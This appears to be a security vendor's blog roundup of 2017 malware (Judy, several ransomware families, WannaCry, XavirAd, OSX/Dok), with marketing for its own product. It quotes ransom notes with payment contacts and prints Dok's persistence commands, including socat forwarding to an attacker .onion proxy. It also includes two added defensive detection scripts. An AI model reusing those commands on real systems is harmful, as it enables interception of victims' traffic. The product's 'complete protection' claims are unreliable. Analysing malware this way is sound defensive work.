The Judy Malware (Android)

Up to 36.5 million Android devices may have been infected by malware that produced fake ad clicks and lined the pockets of its developers. Forty-one apps developed by Korea-based Kiniwini and published under the moniker ENISTUDIO Corp. “infected devices to generate large amounts of fraudulent clicks on advertisements, generating revenues for the perpetrators behind it.”

Google “swiftly” removed the apps from Google Play after being alerted to their existence, but not before they “reached an astonishing spread between 4.5 million and 18.5 million downloads.”

Once a user downloads a malicious app, it silently registers receivers which establish a connection with the [Command and Control] server. The server replies with the actual malicious payload, which includes JavaScript code, a user-agent string and URLs controlled by the malware author. The malware opens the URLs in a hidden web page, using a user agent that imitates a PC browser, and receives a redirection to another website. Once the targeted website is loaded, the malware uses the JavaScript code to locate and click on banners from the Google ads infrastructure.

Keep your Android device protected with the updated Max Total Security for Android.

Despite apps going through periodic reviews, Google’s Play Store security system, named Bouncer, was not able to pick up the malware’s malicious activity.

Google launches new Android security services

On May 17, during Google’s annual I/O event, Google announced a new service called Google Play Protect. According to Google, this new service continuously scans all Android apps and user devices for malicious behavior and uses machine learning to detect suspicious activity. Once it detects a malicious app, it removes it from the phones of all users who installed it.

The new Google Play Protect service suite is currently shipping to all devices with the Google Play app installed.

MoWare H.F.D ransomware

MoWare H.F.D is a ransomware cryptovirus that displays a window with a ransom message. The ransomware is a variant of HiddenTear and appends the extension .H_F_D_locked after encryption. MoWare H.F.D ransomware may also distribute its payload file through spam emails, social media and file-sharing services. MoWare H.F.D ransomware makes entries in the Windows Registry to achieve persistence, and can launch or suppress processes in a Windows environment. Such entries are typically designed to launch the virus automatically with each start of the Windows operating system.

The MoWare H.F.D Ransomware is perceived as a very threatening Trojan because it is designed to encrypt 666 file types and to limit the user’s control of the OS. A detailed report from cyber security researchers revealed that the MoWare H.F.D Ransomware can block access to the Registry Editor, the Task Manager and the Command Line tool. Server administrators may have a hard time purging the MoWare H.F.D Ransomware from their network. The Trojan is associated with the ‘.H_F_D_locked’ string, which is used as a marker to inform users which files have been encrypted. For example, ‘Stars shack.png’ is renamed to ‘Stars shack.png.H_F_D_locked’ and Windows Explorer no longer generates a thumbnail for the photo. The encryption process may trigger error reports in database managers like MySQL, OracleDB and MongoDB. The ransom notification is generated as a program window named ‘MoWare H.F.D’ that says:

‘INFORMATION SECURITY
Your Personal Files has been Encrypted and Locked
Your documents, photos, databases and other important files have been encrypted with strongest encryption and locked with unique key, generated for this computer.
Private decryption key is stored on a secret Internet server and nobody can decrypt your files until you pay and obtain the private key.
Caution: Removing of MoWare H.F.D will not restore access ti your encrypted files.
Frequently Asked Questions
What happened to my files ? understanding the issue
How can i get my files back ? the only way to restore your files
What should i do next ? Buy decryption key
Now you have the last chance to decrypt your files.
1. Buy Bitcoin (https://blockchain.info)
2. Send amount of 0.02 BTC to address: 15nbyuacLHfm3FrC5hz1nigNVqEbDwRUJq
3. Transaction will take about 15-30 minutes to confirm.
4. When transaction is confirmed, send email to us at heyklog@protonmail.com’

You should NOT under any circumstances pay the ransom. Your files may not be restored, and nobody can give you a real guarantee. Moreover, giving money to cybercriminals will likely motivate them to create more ransomware or commit other crimes. You should keep an updated anti-virus program such as Max Total Security, which provides a daily backup and an easy restore mechanism in case you get infected with any ransomware.

LightningCrypt ransomware

LightningCrypt is crypto-malware that uses a strong encryption cipher to lock various data stored on the targeted computer. This file-encrypting virus appends the .LIGHTNING file extension to each of the encrypted pictures, audio, video and text files, documents, databases and other widely used records. As soon as all targeted data is locked, the ransomware delivers a ransom note in the file LightningCrypt_Recover_Instructions.txt and triggers a pop-up window.

The threatening letter from the cyber criminals states that trying to recover data or deleting LightningCrypt ransomware will lead to data loss. According to the ransom note, the only way to decrypt files is to transfer 0.17 Bitcoins to the provided address. Once the transaction is made, the damaged files should be recovered immediately. However, the chances that you will never get your files back are quite high.

Cybercriminals created this malicious program to swindle money from innocent computer users. Thus, they may not bother decrypting the files, because no one can find and punish them for an unkept promise. LightningCrypt infects a system when the user opens an infected email attachment. As soon as a person clicks on such a file, the malware payload is dropped and executed on the system. Apart from encrypting data, the ransomware also modifies the registry and creates entries in order to run itself automatically when Windows is launched. What is more, this infection leaves the computer vulnerable and might open a backdoor to other malware.

You should keep an updated anti-virus program such as Max Total Security, which provides a daily backup and an easy restore mechanism in case you get infected with any ransomware.

May Ransomware

In the month of May we saw a new ransomware called May Ransomware. Once it has infiltrated a system, May encrypts various data using the AES-256 and RSA-4096 encryption algorithms and appends the “.locked” extension to filenames (for example, “sample.jpg” is renamed to “sample.jpg.locked”). May then creates a text file (“Restore_your_files.txt”) containing a ransom-demand message and places it in each folder containing encrypted files.

The message informs victims of the encryption and makes a ransom demand of 1 Bitcoin (approximately $1750) in exchange for file decryption. As mentioned above, May employs AES and RSA cryptography and, therefore, decryption without the unique keys is impossible. All of the files that get encrypted receive the same extension appended to them, namely the ‘.maysomware’ and ‘.locked’ extensions.

The criminals provide each of their victims with a personal identification number. Presumably, the hackers keep all the IDs in some sort of database next to the unique decryption keys. That is why the victims are asked to submit this number along with the payment. Nevertheless, this does not mean that you should. On the contrary, you should avoid getting involved in any type of collaboration with the criminals and take all possible measures to remove the May virus from your computer.

You should keep an updated anti-virus program such as Max Total Security, which provides a daily backup and an easy restore mechanism in case you get infected with any ransomware.

Google Play Apps Found Serving Adware

Dozens of applications available on Google Play were found delivering a strain of adware, carried by the XavirAd library, that is capable of collecting users’ personal information.

With these apps installed, users see a full-screen advertisement pop up at regular intervals even when the app is closed. For example:

(Screenshot: adware pop-up)

The program then downloads another .dex file from cloud.api-restlet.com, which collects the following information from the user’s device:

Email address for Google account
List of apps installed
IMEI identifier and android_id
Screen resolution
Manufacturer, model, brand, OS version
SIM operator
App installation source

Researchers also found that XavirAd uses encrypted strings to avoid detection. Each class has its own decryption routine in the class constructor, and although the algorithm remains the same, the keys are different in each class.

Furthermore, the XavirAd library uses anti-sandbox techniques to hide from dynamic analysis, stopping its malicious behaviour once it detects that it is running in a testing environment. As a further safety net against analysts, it also checks the user’s email address: if the address contains any of the following strings, it stops the action:

The following Google Play apps contain XavirAd, and users may want to avoid them:

(Figure: list of Google Play apps containing XavirAd)

WanaCry Ransomware

WanaCrypt, also known as WanaCry or “WannaCry”, is a new ransomware that wreaked havoc across the world last night. It spreads like a worm by leveraging a Windows SMB vulnerability (MS17-010) that Microsoft had already fixed in March. In these attacks, data is encrypted and the extension “.WCRY” is added to the filenames. The infection is initiated through an SMBv2 remote code execution in Microsoft Windows. This exploit (codenamed “EternalBlue”) was made available on the internet through the Shadow Brokers dump on April 14th, 2017, and was patched by Microsoft on March 14.

Unfortunately, it appears that many organizations have not yet installed the patch.

In the wake of the largest ransomware attack in history, which had already infected over 114,000 Windows systems worldwide in the last 24 hours, Microsoft took the unusual step of protecting customers with out-of-date computers. Microsoft released an emergency security patch for all its unsupported versions of Windows, including Windows XP, Vista, Windows 8, Server 2003 and 2008 editions. Download the patch for this vulnerability from https://technet.microsoft.com/en-us/library/security/ms17-010.aspx.

No new infections will occur with yesterday’s strain, but people already infected with this ransomware will not get their files back. Currently, there is no known method of breaking the ransomware’s encryption. The only viable method of getting files back at the moment is from previous operating system backups, or by paying the ransom as a last resort. We recommend using Max Total Security, which can help you restore your files from its daily backup module (Tools > Max Backup Utility). It can also detect and terminate this ransomware, stopping it from spreading further on your PC.

Max Total Security also has a newly introduced module among its tools, Tools > Max Application Whitelist. This module allows you to completely protect your PC from any unauthorized, unwelcome executables. In normal day-to-day operation you know which programs you are going to use on your PC, so just go to this tool and allow those applications which run from the Program Files folder. System executables are already taken care of. From then on, no other executable will be allowed to run on your PC, completely protecting it from any type of Trojan.

Amnesia ransomware

The Amnesia Ransomware is used to take the victims’ files hostage. Ransomware Trojans like the Amnesia Ransomware are designed to encrypt the victim’s files using a strong encryption algorithm. It encrypts the victim’s files, preventing access to their sensitive and other personal files, and appends the .amnesia extension to the names of all encrypted files. The attacker then demands a ransom in exchange for file decryption.

The files encrypted in the Amnesia Ransomware attack will no longer be readable and may show up as blank icons in Windows Explorer. The Amnesia Ransomware targets a wide variety of files, generally looking for user-generated files that may include spreadsheets, text documents, images, videos, music files, databases, etc. The Amnesia Ransomware delivers its ransom note in the form of a text file named ‘HOW TO RECOVER ENCRYPTED FILES.TXT’. This file alerts the victim to the attack and demands the payment of a ransom to recover the encrypted files. The full text of the Amnesia Ransomware ransom note:

‘YOUR FILES ARE ENCRYPTED!
Your personal ID:
[RANDOM CHARACTERS]
Attention! What happened?
Your documents, databases and other important data has been encrypted.
If you want to restore files send an email to: s1an1er111@protonmail.com
In a letter to indicate your personal identifier (see in the beginning of this document).
Attention!
* Do not attempt to remove the program or run the anti-virus tools.
* Attempts to self-decrypting files will result in the loss of your data.
* Decoders are not compatible with other users of your data, because each user’s unique encryption key.’

The best protection against the Amnesia Ransomware and similar ransomware threats is to have backups of all files on an independent storage device or in the cloud, as well as a reliable security program like Max Total Security that is fully up to date and capable of intercepting the Amnesia Ransomware and similar threats before they can infect the system.

Mikoyan ransomware

The infection process of the .MIKOYAN ransomware is very similar to that of other ransomware infections. The malware may take advantage of massive spam campaigns that distribute malicious attachments as well as web links that lead to the download of the infection files. Such e-mails are cleverly crafted to convince users to open the attachment.

Besides e-mail, the .MIKOYAN ransomware virus may also be distributed via multiple other methods, such as:

Exploit kits.
Via a previous infection with a botnet or a Trojan.
Through fake installers, flash player updates or other setup wizards.
Via fake key generators or license activators uploaded to torrent websites.

Once this ransomware infection has become active on a computer, the .MIKOYAN virus drops its malicious payload files. They are often located in the following Windows directories:

%Common%
%AppData%
%LocalLow%
%Local%
%Roaming%

Besides the main executable of the MIKOYAN ransomware, named MIKOYAN.exe, the virus may also drop other malicious files under different, often randomly generated, names. After the encryption process has completed, the ransomware appends the .MIKOYAN file extension to the files it has encrypted.

To run on startup, the MIKOYAN ransomware may also modify the Windows Registry, more specifically the Run and RunOnce registry keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
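An added example, not the page's own or Max Secure Software's code: a Python audit that parses a reg export dump of the four autostart keys above and flags any entry whose executable lives in the profile directories the page lists as drop locations. The .reg text, including its MIKOYAN entry, is constructed for the example.

```python
# Audit Run/RunOnce values from a 'reg export' dump: flag any autostart command
# whose executable lives in a user-writable profile directory (MIKOYAN's drop locations).
import re

# The four autostart keys listed on the page (compared lower-cased).
RUN_KEYS = {
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
    r"hkey_local_machine\software\microsoft\windows\currentversion\runonce",
    r"hkey_current_user\software\microsoft\windows\currentversion\runonce",
}
# Drop locations from the page; %Local%, %LocalLow% and %Roaming% are the blog's
# shorthand for the AppData subfolders, so the expanded path form is matched too.
SUSPICIOUS_DIR_PATTERNS = (
    r"%appdata%", r"%localappdata%", r"%temp%", r"%tmp%",
    r"\\appdata\\(local|locallow|roaming)\\",
)
SECTION_RE = re.compile(r"^\[(.+)\]\s*$")
VALUE_RE = re.compile(r'^"([^"]*)"="((?:[^"\\]|\\.)*)"\s*$')

def parse_reg_export(text):
    """Return (key, value_name, command) for every string value under RUN_KEYS."""
    entries, current = [], None
    for line in text.splitlines():
        section = SECTION_RE.match(line)
        if section:
            current = section.group(1) if section.group(1).lower() in RUN_KEYS else None
            continue
        value = VALUE_RE.match(line) if current else None
        if value:
            name, raw = value.groups()
            # .reg escapes backslashes and double quotes with a backslash.
            entries.append((current, name, re.sub(r"\\(.)", r"\1", raw)))
    return entries

def executable_path(command):
    """First token of a command line, honouring a quoted path with spaces."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]

def is_suspicious(command):
    exe = executable_path(command).lower()
    return any(re.search(p, exe) for p in SUSPICIOUS_DIR_PATTERNS)

def audit(text):
    return [e for e in parse_reg_export(text) if is_suspicious(e[2])]

# Constructed sample dump: one legitimate entry and two persistence entries.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"
"MIKOYAN"="C:\\Users\\alice\\AppData\\Roaming\\MIKOYAN.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"svc"="\"%AppData%\\x7f2k.exe\""
'''
```

On a real machine, produce the input with reg export for each of the four keys and read the file with encoding="utf-16", since reg export writes UTF-16 text.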

As always, we recommend that you keep an updated copy of Max Total Security on your PC, which can restore your files from its built-in daily backup. Also, 24×7 free support can help you with any issues. You can get it from here: Max Total Security.

XPan Ransomware

The XPan Ransomware is being used to target small and medium businesses located in Brazil (although nothing limits these attacks to Brazil, since such attacks can target computers anywhere). The XPan Ransomware attacks are carried out by taking advantage of poorly protected remote desktop connections. Exploiting poor password protection and security measures, con artists can install the XPan Ransomware on the victims’ computers, as well as carry out other threatening operations.

The ransomware, suspected to be distributed by a group of small-time cybercriminals, has already affected many computers belonging to small and medium businesses in the country. The similarities between XPan and the .one ransomware were found during an in-depth analysis of the malicious program. They include the targeted file extensions, the ransom note, the commands executed before and after the encryption process and even the criminals’ public RSA keys.

For each target file the malware generates a new unique 255-byte random string S (which contains the substring “NMoreira”), turns it into a 256-bit key using the CryptDeriveKey API, and proceeds to encrypt the file content using AES-256 in CBC mode with a zero IV. According to one of the victims, the criminals were asking for 0.3 bitcoin to provide the recovery key, using the same approach as before: the user sends a message to a mailbox with his unique ID and awaits further instructions.

OSX Malware – Dok

People often assume that if you’re running OSX, you’re relatively safe from malware. But this is becoming less and less true, as evidenced by a new strain of malware encountered by the Check Point malware research team. This new malware – dubbed OSX/Dok — affects all versions of OSX.

This is the first “major scale” malware directed at Mac owners through a “coordinated email phishing campaign.” The emails are aimed mostly at Europeans, one example being a German-language message from a supposed Swiss official, claiming problems with the target’s tax return.

The malware works by gaining administration privileges in order to install a new root certificate on the user’s system. This enables it to gain access to all communications between the host Mac and the internet, including traffic flowing through connections encrypted with SSL.
The malware later presents the user with a security message claiming an update is available for the system, for which a password input is required. Following the “update”, the malware gains complete control of admin privileges, adjusts the network settings to divert all outgoing connections through a proxy, and installs additional tools that enable it to perform a man-in-the-middle attack on all traffic.

The malware bundle is contained in a .zip archive named Dokument.zip. It was signed on April 21st, 2017 by a “Seven Muller” and the bundle name is Truesteer.AppStore.

Upon execution, the malware will copy itself to the /Users/Shared/ folder, and will then proceed to execute itself from the new location by running the shell commands below:

chmod +x /Users/Shared/AppStore.app                            # gives all users execute permission
rm -fr "/Users/_%USER%_/Downloads/Dokument.app"                # delete the original copy
"/Users/Shared/Appstore.app/Contents/MacOS/AppStore"Dokument   # execute the application

The malware will also install two LaunchAgents that start at system boot and have the following names:

/Users/_%User%_/Library/LaunchAgents/com.apple.Safari.proxy.plist

/Users/_%User%_/Library/LaunchAgents/com.apple.Safari.pac.plist

These LaunchAgents will redirect requests to 127.0.0.1 through the dark web address “paoyu7gub72lykuk.onion”. This is necessary for the previous PAC configuration to work (note that the original configuration looks for the PAC file on the local host 127.0.0.1).

These LaunchAgents run the following commands:

/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050

/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:5588,socksport=9050

As a result of all of the above actions, when attempting to surf the web, the user’s web browser will first ask the attacker web page on TOR for proxy settings. The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim’s traffic and tamper with it in any way they please.
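An added triage script, not from the page or from Check Point's report: it parses LaunchAgent plists with Python's standard plistlib and flags the two traits of Dok's agents described above, an Apple-namespaced label sitting in the per-user LaunchAgents folder and a socat command forwarding a localhost listener into a .onion host over SOCKS. The page gives only the socat command lines, so the plist wrappers around them are constructed.

```python
# Triage per-user LaunchAgent plists for the OSX/Dok proxy pattern: an Apple-
# namespaced label in ~/Library/LaunchAgents (Apple's own agents live under
# /System/Library/LaunchAgents) and a socat command forwarding a localhost
# listener into a Tor hidden service over SOCKS.
import plistlib
import re
from pathlib import Path

ONION_RE = re.compile(r"[a-z2-7]{16,56}\.onion", re.I)   # v2 or v3 .onion host
LISTEN_RE = re.compile(r"tcp4?-listen:(\d+)", re.I)      # socat listener spec
def analyse_agent(plist_bytes):
    """Return a triage dict for one LaunchAgent; 'reasons' is empty when clean."""
    data = plistlib.loads(plist_bytes)
    label = str(data.get("Label", ""))
    cmd = " ".join(str(a) for a in data.get("ProgramArguments") or [])
    reasons = []
    if label.startswith("com.apple."):
        reasons.append("Apple-namespaced label in a user LaunchAgent")
    onion = ONION_RE.search(cmd)
    if onion:
        reasons.append("command references a Tor hidden service")
    listen = LISTEN_RE.search(cmd)
    if "socat" in cmd and listen and "SOCKS4A:" in cmd.upper():
        reasons.append("socat forwards a local listener through a SOCKS proxy")
    return {
        "label": label,
        "listen_port": int(listen.group(1)) if listen else None,
        "onion": onion.group(0).lower() if onion else None,
        "reasons": reasons,
    }

def scan_launch_agents(directory):
    """Analyse every .plist in a LaunchAgents folder, keyed by file name."""
    results = {}
    for path in sorted(Path(directory).glob("*.plist")):
        try:
            results[path.name] = analyse_agent(path.read_bytes())
        except Exception as exc:   # a plist launchd cannot parse is worth a look too
            results[path.name] = {"label": None, "listen_port": None,
                                  "onion": None, "reasons": [f"unparsable: {exc}"]}
    return results

# Constructed sample reproducing Dok's first agent: the page gives only the
# socat command line, so the plist wrapper around it is an assumption.
DOK_PROXY_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.Safari.proxy</string>
  <key>ProgramArguments</key><array>
    <string>/usr/local/bin/socat</string>
    <string>tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1</string>
    <string>SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050</string>
  </array>
</dict></plist>"""

# Constructed benign agent for comparison.
BENIGN_PLIST = b"""<plist version="1.0"><dict>
  <key>Label</key><string>com.example.nightly-backup</string>
  <key>ProgramArguments</key><array><string>/usr/local/bin/backup</string></array>
</dict></plist>"""
```

Run scan_launch_agents on ~/Library/LaunchAgents to triage a real user folder; anything with a non-empty reasons list deserves a look.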

Beware of email attachments, and do not enter your root password when an app asks for it. Also, keep an updated copy of Mac Total Security by Max Secure Software.